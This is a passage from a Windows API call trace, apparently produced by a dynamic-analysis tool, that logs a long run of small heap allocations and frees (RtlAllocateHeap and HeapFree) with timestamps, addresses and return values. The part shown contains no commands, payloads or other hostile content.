RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.694] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.694] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.695] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.695] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.700] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483bb8 [0117.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483bb8 | out: hHeap=0x12c0000) returned 1 [0117.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.701] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483bb8 [0117.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483bb8 | out: hHeap=0x12c0000) returned 1 [0117.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.703] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.703] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.704] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.704] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.705] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.705] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.706] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.706] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.706] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.706] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.706] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.706] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.706] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.706] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.706] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.706] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483bb8 [0117.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483bb8 | out: hHeap=0x12c0000) returned 1 [0117.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483bb8 [0117.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483bb8 | out: hHeap=0x12c0000) returned 1 [0117.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483bb8 [0117.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483bb8 | out: hHeap=0x12c0000) returned 1 [0117.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.709] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.709] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483bb8 [0117.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.710] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483bb8 | out: hHeap=0x12c0000) returned 1 [0117.710] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.711] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.711] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483bb8 [0117.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.712] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.712] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483bb8 | out: hHeap=0x12c0000) returned 1 [0117.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.713] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.713] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.714] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.714] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.714] HeapFree (in: hHeap=0x12c0000, 